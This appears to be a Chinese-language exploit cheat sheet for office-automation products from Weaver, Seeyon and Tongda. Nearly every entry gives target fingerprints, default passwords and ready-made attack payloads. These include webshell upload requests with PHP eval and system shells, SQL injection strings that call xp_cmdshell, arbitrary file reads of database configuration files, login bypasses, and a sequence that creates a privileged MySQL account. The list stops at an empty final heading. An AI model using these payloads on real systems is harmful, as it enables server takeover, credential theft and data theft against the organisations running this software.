  • 相关文章- E-Cology WorkflowServiceXml RCE- 泛微E-Cology WorkflowServiceXml RCE- HVV行动之某OA流量应急- 微某OA从0day流量分析到武器化利用- 泛微 WorkflowServiceXml RCE 复现

泛微OA weaver.common.Ctrl 任意文件上传漏洞

  • 描述泛微 OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传 webshell 文件控制服务器
  • 相关文章- 泛微OA weaver.common.Ctrl 任意文件上传漏洞- 泛微OA 前台GetShell复现- HVV 某OA文件上传漏洞分析

com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction 任意文件上传

  • 相关文章 - 泛微e-cology任意文件上传(已修复)

weaver.workflow.exceldesign.ExcelUploadServlet 任意文件上传

  • 相关文章 - 泛微e-cology另一接口任意文件上传(已修复)

/workrelate/plan/util/uploaderOperate.jsp + /OfficeServer 文件上传

管理员任意登录

  • POC | Payload | exp/mobile/plugin/VerifyQuickLogin.jspidentifier=1&language=1&ipaddress=

e-bridge

fofa: app="泛微-云桥 e-Bridge"

泛微云桥 /wxjsapi/saveYZJFile 任意文件读取

  • 描述未授权任意文件读取,/wxjsapi/saveYZJFile 接口获取 filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。
  • 相关文章- 泛微云桥-任意文件读取深入利用
  • POC | Payload | expdownloadUrl 参数修改成需要获取文件的绝对路径,记录返回包中的 id 值/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c:windows/win.ini&fileExt=txt通过查看文件接口访问 /file/fileNoLogin/id/file/fileNoLogin/xxxxxxxxxxxxxxxxx参考安识科技 A-Team 利用方法,https://mp.weixin.qq.com/s/Y_2_e7HIWH3z5jhMsK7pZA```参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历”/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt常见路径d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.propertiesd:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库```

e-office

fofa: app="泛微-EOffice"

指纹

  • /general/login/index.php

相关文章

  • 【攻防演练】某协同办公系统多个1day分析过程

CNVD-2021-49104 E-Office v9 任意文件上传漏洞

  • 相关文章- 某 E-Office v9 任意文件上传漏洞复现- 某office前台任意文件上传漏洞分析- 记一次PHP文件上传WAF+沙盒绕过
  • POC | Payload | exp- bigsizeme/CNVD-2021-49104

E-office do_excel.php任意文件写入漏洞

  • POC | Payload | exp/WWW/general/charge/charge_list/do_excel.phphtml=<?php system($_POST[pass]);?>

eoffice10 前台 getshell

  • POC | Payload | exp查看版本 /eoffice10/version.json<form method='post'action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'enctype="multipart/form-data" ><input type="file" name="FileData"/></br></br><input type="text" name="FormData" value="1"/></br></br><button type=submit value="上传">上传</button> </form>``````POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1Host: XXXXXXXX:8010Content-Length: 378Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/91.0.4472.77 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7Connection: close------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; name="FileData"; filename="1.jpg"Content-Type: image/jpeg<?php echo md5(1);?>------WebKitFormBoundaryJjb5ZAJOOXO7fwjsContent-Disposition: form-data; name="FormData"{'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

任意文件上传

  • POC | Payload | exp/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save后缀 xxx.php./attachment/xxxxx.php

全回显SSRF可RCE

  • POC | Payload | exp/E-mobile/App/Ajax/ajax.php?action=dingtalkImg&result[]=http://x.x.x.x/1.php/attachment/xxxxx.php

回显SSRF

  • POC | Payload | exp/E-mobile/App/System/File/downfile.php?url=Host: www.baidu.com

致远

官网 : http://www.seeyon.com/

Fofa : app="致远互联-OA"

相关文章

  • 致远A8数据库密码解密
  • Seeyon A8 登录hash破解案例

相关工具

  • Summer177/seeyon_exp
  • nex121/SeeyonEXP
  • Rvn0xsy/PassDecode-jar - 帆软/致远密码解密工具
  • z1un/seeyou_exp

致远OA数据库配置文件

/opt/Seeyon/A8/base/conf/datasourceCtp.properties

指纹

  • /seeyon/htmlofficeservlet
  • /seeyon/index.jsp
  • seeyon

默认口令

system/system
group-admin/123456
admin1/123456
gov-admin/123456
audit-admin/123456

致远OA Session泄漏漏洞

需登录账户,注入发生在search_result.jsp文件中的docTitle参数

  • POC | Payload | exp/yyoa/ext/https/getSessionList.jsp?cmd=getAll

致远OA A6 search_result.jsp sql注入漏洞

  • POC | Payload | exp/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc

致远OA A6 setextno.jsp sql注入漏洞

  • POC | Payload | exp/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23

致远OA A6 重置数据库账号密码漏洞

  • POC | Payload | exp/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}

致远OA A6 敏感信息泄露

  • POC | Payload | exp/yyoa/createMysql.jsp/yyoa/ext/createMysql.jsp/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0

致远 OA A6 test.jsp sql 注入漏洞

  • 相关文章- 用友致远A6 OA存在sql注入并拿shell- 致远OA A6 test.jsp SQL注入漏洞
  • POC | Payload | exp/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database())/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)

致远OA A8 未授权访问

  • POC | Payload | exp/seeyon/main.do?method=officeDown&filename=c:/boot.ini

致远OA A8 任意用户密码修改漏洞

  • 相关文章- 申通快递某系统存在任意用户密码修改漏洞 -wooyun-2016-0215609- 风行在线某系统任意用户密码重置漏洞(管理员账号为例/涉及内部架构/文件等敏感信息) -wooyun-2016-0213554
  • POC | Payload | exp/seeyon/services/authorityService?wsdl

致远OA A8-m 后台万能密码

  • POC | Payload | expwww.test.com/seeyon/management/status.jspWLCCYBD@SEEYON

致远OA A8-v5 无视验证码撞库

  • 描述致远 A8-V5 在设计时存在逻辑错误,用户修改密码时对原密码进行了验证,但是验证使用的服务存在未授权访问漏洞,系统对非合法请求的原密码验证功能进行回应,导致了无视验证码,无需 login 页面进行密码尝试
  • POC | Payload | expGET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0Accept: */*Accept-Language: zh-cnReferer: http://www.test.com/seeyon/individualManager.do?method=managerFramerequesttype: AJAXContent-Type: application/x-www-form-urlencodedCookie: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: www.test.comDNT: 1Proxy-Connection: Keep-Alive

致远OA A8-v5 任意用户密码修改

  • 描述致远 A8-V5 在设计时存在逻辑错误,在上一步对原始密码进行验证后,下一步不再检测原始密码,从而直接修改用户密码,导致平行权限的越权漏洞。
  • POC | Payload | expPOST /seeyon/individualManager.do?method=modifyIndividual HTTP/1.0Accept: text/html, application/xhtml+xml, */*Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrameAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedProxy-Connection: Keep-AlivePragma: no-cacheContent-Length: 86DNT: 1Host: www.test.comCookie: JSESSIONID=DA71A65B3AAD45823A1FADAB80A3E685; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849,1419232608; avatarImageUrl=8469117046183055270; loginPageURL="/main.do"individualName=admin&formerpassword=123456&nowpassword=wy123456&validatepass=wy123456individualName为用户名注意,此处需要以一个合法的JSESSIONID发送如上数据即可修改任意用户密码,合法的JSESSIONID由撞库得出。

致远OA帆软报表组件反射型XSS&SSRF

  • 相关文章 - 致远OA帆软报表组件反射型XSS&SSRF漏洞

致远 OA 帆软报表组件前台 XXE 漏洞

  • 相关文章 - 致远OA帆软报表组件前台XXE漏洞挖掘过程

A8-OA-seeyon-RCE

  • 相关文章- 致远A8协同办公系统poc/seeyon 0day- 致远 OA A8 htmlofficeservlet getshell (POC&EXP)- 某单位攻防演练期间的一次应急响应
  • POC | Payload | exp- RayScri/A8-OA-seeyon-RCE

CNVD-2020-62422 webmail.do任意文件下载

  • 影响版本- 致远OA A6-V5- 致远OA A8-V5- 致远OA G6
  • POC | Payload | exphttp://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=a.txt&filePath=../conf/datasourceCtp.properties

致远OA任意管理员登陆

  • 相关文章 - 致远OA任意管理员登陆漏洞分析

CNVD-2021-01627 && 致远 OA ajax.do 登录绕过任意文件上传

  • 相关文章- 致远OA ajax.do登录绕过任意文件上传- 致远OA ajaxAction formulaManager 文件上传漏洞
  • POC | Payload | expPOST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1Host: 127.0.0.1Connection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN;Content-Type: application/x-www-form-urlencodedContent-Length: 8819managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00Webshell地址:https://xxxxx/seeyon/SeeyonUpdate1.jspx冰蝎3 默认马pass:rebeyond

A5-V8 致远OA任意文件下载漏洞

  • 相关文章 - 致远OA任意文件下载漏洞(已修复)

致远OA fastjson远程代码执行漏洞

  • 相关文章 - 致远OA fastjson远程代码执行漏洞复现- 致远伪0day_FastJson利用链

通达

官网 : https://www.tongda2000.com/
fofa: app="TDXK-通达OA"

指纹

  • tongda.ico
  • Office Anywhere 20xx版 网络智能办公系统
  • /ispirit/interface/gateway.php
  • /mac/gateway.php

相关文章

  • 通达OA多处SQL注入漏洞
  • OA-HUNTER/TongDa-OA

相关工具

  • xinyu2428/TDOA_RCE - 通达OA综合利用工具
  • kitezzzGrim/tongda-exp - python编写的多个通达常见漏洞exp

通达oa 2007 sql注入漏洞

  • POC | Payload | exp/general/document/index.php/setting/keywords/index_SERVER[QUERY_STRING]=kname=1%2Band@``%2Bor%2Bif(substr(user(),1,4)=root,1,exp(710))#

通达oa 2011-2013 GETSHELL

  • POC | Payload | exp/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}/general/email/index.php/general/email/shell.php 密码C

2013、2015版本 文件包含

  • POC | Payload | expwww.test.com/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../inc/js/menu_left.js头像常见路径: \MYOA\webroot\attachment\avatar\XXX.jpg

2013、2015版本 SQL 注入

  • POC | Payload | expwww.test.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random``````POST /general/document/index.php/recv/register/turn HTTP/1.1_SERVER=&rid=1'_SERVER=&rid=exp(if((1=1),1,710))``````POST /general/document/index.php/recv/register/insert HTTP/1.1title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=

2013、2015版本 未授权访问

  • POC | Payload | expwww.test.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3www.test.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50

2013、2015版本 敏感信息泄露

  • POC | Payload | expwww.test.com/general/get_userinfo.phpwww.test.com/general/ipanel/user/query.phpwww.test.com/general/info/dept/

2013、2015版本 XSS

  • POC | Payload | exp发送邮件、问题问答存在 XSS<img src=x onerror=alert(1)>

2013、2015版本 越权

  • POC | Payload | expwww.test.com/interface/ugo.php?OA_USER=admin``````www.test.com/general/system/database/GET 转为 POST 加上参数 _SERVER=

2013、2015版本 任意⽂件上传漏洞

  • POC | Payload | exp<form enctype="multipart/form-data" action="http://www.test.com/general/vmeet/wbUpload.php?fileName=test.php+" method="post"><input type="file" name="Filedata" size="50"><br><input type="submit" value="Upload"></form>shell地址为 : www.test.com/general/vmeet/wbUpload/test.php

通达OA 11.2 后台getshell

系统管理-附件管理-添加存储目录
设置存储目录 (一般默认网站安装目录为 D:/MYOA/webroot/ 最后也有路径获取的地方,如果不设置会不在网站根目录下,无法直接访问附件)
寻找附件上传
通过.php. 绕过黑名单上传
根据返回结果拼接上传路径:/im/1912/383971046.test.php 直接访问(im是模块)

通达 OA 任意用户登录漏洞

  • 影响版本- 通达 OA 2017- 通达 OA V11.X--V11.5
  • 相关文章- 通达OA < 11.5任意用户登录漏洞分析- 通达OA 任意用户登录漏洞(匿名RCE)分析- 通达OA<11.5任意用户登录另一处利用方法分析- HW平安夜: 09/14 快乐源泉
  • POC | Payload | exp- NS-Sp4ce/TongDaOA-Fake-User第一种利用方法1. 拿到 uid/general/login_code.php/ispirit/login_code.php2. 拿 cookiePOST /logincheck_code.phpcodeuid={9E908086-342B-2A87-B0E9-E573E226302A}&uid=13. 访问验证/general/index.php?is_modify_pwd=1第二种利用方法1. 首先访问 /ispirit/login_code.php 获取 codeuid。/ispirit/login_code.php2. 访问 /general/login_code_scan.php 提交 post 参数,拿到cookiePOST /general/logincheck_code.phpcodeuid={9E908086-342B-2A87-B0E9-E573E226302A}&source=pc&uid=1&type=confirm&username=admin3. 访问 /ispirit/login_code_check.php?codeuid=xxx/ispirit/login_code_check.php?codeuid={9E908086-342B-2A87-B0E9-E573E226302A}3. 访问验证/general/index.php?is_modify_pwd=1

通达oa 11.5 sql注入漏洞

  • POC | Payload | expPOST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: https://www.0-sec.org/portal/home/Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffConnection: keep-aliveHost: www.0-sec.orgPragma: no-cacheX-Requested-With: XMLHttpRequestContent-Length: 154X-WVS-ID: Acunetix-Autologin/65535Cache-Control: no-cacheAccept: */*Origin: https://www.0-sec.orgAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencoded; charset=UTF-8starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1``````/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=&timestamp=1598069133&total=``````/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total=/general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag=``````/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2``````POST /general/file_folder/swfupload_new.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/Connection: closeHost: 192.168.202.1Content-Length: 391Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-USContent-Type: multipart/form-data; boundary=----------GFioQpMK0vv2------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_ID"1------------GFioQpMK0vv2Content-Disposition: form-data; name="ATTACHMENT_NAME"1------------GFioQpMK0vv2Content-Disposition: form-data; name="FILE_SORT"2------------GFioQpMK0vv2Content-Disposition: form-data; name="SORT_ID"------------GFioQpMK0vv2--``````POST /general/file_folder/api.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/file_folder/public_folder.php?FILE_SORT=1&SORT_ID=59X-Resource-Type: xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 82x-wvs-id: Acunetix-Deepscan/209Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8CONTENT_ID_STR=222&SORT_ID=59&FILE_SORT=1&action=sign``````POST /general/appbuilder/web/meeting/meetingmanagement/meetingreceipt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=trueX-Resource-Type: xhrCookie: PHPSESSID=g1njm64pl94eietps80muet5d7; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=fab32701Connection: closeHost: 192.168.202.1Pragma: no-cachex-requested-with: XMLHttpRequestContent-Length: 97x-wvs-id: Acunetix-Deepscan/186Cache-Control: no-cacheaccept: */*origin: http://192.168.202.1Accept-Language: en-UScontent-type: application/x-www-form-urlencoded; charset=UTF-8m_id=5&join_flag=2&remark='%3b%20exec%20master%2e%2exp_cmdshell%20'ping%20172%2e10%2e1%2e255'--- 通达OA V11.5电子邮箱接口SQL注入复现

通达oa 11.5 未授权访问漏洞

  • POC | Payload | exp/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=1597997506&view=agendaDay

通达 OA 任意文件上传漏洞+本地文件包含漏洞

  • 相关文章- 通达OA任意文件上传漏洞详细分析
  • 详情- 2013/ispirit/im/upload.php/ispirit/interface/gateway.php- 2017/ispirit/im/upload.php/mac/gateway.php
  • POC | Payload | exp- jas502n/OA-tongda-RCEPOST /mac/gateway.php HTTP/1.1Host: 127.0.0.1User-Agent: Go-http-client/1.1Connection: closeContent-Length: 44Content-Type: application/x-www-form-urlencodedAccept-Encoding: gzipjson={"url":"/general/../../mysql5/my.ini"}

通达OA v11.6 preauth RCE

  • 描述利用需要删除 auth.inc.php,可能会损坏OA系统
  • 相关文章- 通达OA11.6 preauth RCE 0day分析
  • POC | Payload | exp- poc_and_exp/rce.py

通达OA v11.7 后台SQL注入

  • 相关文章- 通达OA v11.7后台SQL注入到RCE[0day]
  • POC | Payload | exp需要登录权限/general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=(SELECT count(*) FROM information_schema.columns A, information_schema.columns B where 1=1 and (LENGTH(database())=5))/general/hr/manage/query/delete_cascade.php?condition_cascade=select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))添加一个mysql用户grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION给创建的at666账户添加mysql权限UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));刷新数据库登录到数据库/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录/general/hr/manage/query/delete_cascade.php?condition_cascade=grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

通达OA v11.7 后台任意文件读取

  • POC | Payload | exp/ispirit/im/photo.php?AVATAR_FILE=c:/oa/bin/redis.windows.conf&UID=1

通达OA v11.7 后台敏感信息泄露

  • POC | Payload | exp/general/approve_center/archive/getTableStruc.php

通达OA v11.7 后台ssrf

  • POC | Payload | exp/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=wqx0mc.dnslog.cn

通达OA v11.7 在线用户登录漏洞

  • 相关文章- https://forum.90sec.com/t/topic/1589- 通达OA v11.7 在线用户登录漏洞- 通达OA11.7 利用新思路(附EXP)- 通达OA11.7 任意用户登陆
  • POC | Payload | exphttp://x.x.x.x/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0http://x.x.x.x/general/

通达oa 11.7 后台getshell

